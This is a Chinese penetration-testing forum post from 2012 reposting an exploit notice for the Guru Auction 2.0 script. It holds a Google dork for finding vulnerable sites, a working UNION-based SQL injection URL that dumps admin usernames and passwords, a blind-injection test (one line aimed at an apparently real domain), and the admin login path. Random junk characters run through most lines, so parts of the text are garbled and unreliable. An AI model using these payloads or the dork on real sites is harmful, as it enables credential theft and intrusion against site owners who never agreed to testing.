中国网络渗透测试联盟

标题: Guru Auction 2.0多重sql注射 [打印本页]

作者: admin    时间: 2012-12-31 09:24
标题: Guru Auction 2.0多重sql注射
Guru Auction 2.0 Multiple SQL Injection Vulnerabilities
$ |) @5 `$ c- D5 H& t" I* I
, f- \. e* P. l- k) g7 ?* Y; z作者     : v3n0m" y4 a6 Y: r2 y1 q" g; l" p  {
应用 : Guru Auction 2.0  w0 C" w1 b! F% o, w
Price       : $49# _1 e# S$ ]9 x! C; \
Vendor      : http://www.guruscript.com/
+ E+ e$ |+ H2 n6 W0 H& IGoogle Dork : inurl:subcat.php?cate_id=
& V- P# V) G3 \; B4 h" T/ y, }
4 l: l. y, M3 q6 x' rSQLi p0c:
4 N% [2 w( n; p; z+ x3 @~~~~~~~~~~) l% z/ W2 _) I7 \
http://domain.tld/[path]/subcat.php?cate_id=-9999+union+all+select+null,group_concat(user_name,char(58),password),null+from+admin--
: |" R" z* E0 l  p1 { 3 O# i5 E2 f* b
+ n1 M& W7 M, k$ {8 e1 d$ r3 Y3 I
盲注 p0c:) j& C! ?  N4 i9 w9 U
~~~~~~~~~~
- U" F- K, L; F# k% L/ j, r! R$ Phttp://www.political-security.com /[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=5 << true
7 l$ L" v, O2 C! e" ihttp://domain.tld/[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=4 << false, @4 w4 m1 U, v8 ~; H) o) c
" Z6 |% p3 I% b' G  u* ]
管理登录入口:
, q; A* M0 ~: k) D  t: Z~~~~~~~~~~
+ Q/ Q$ f- u# e! Thttp://domain.tld/[path]/admin/
; `7 W% C% k& {5 w% R* P




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2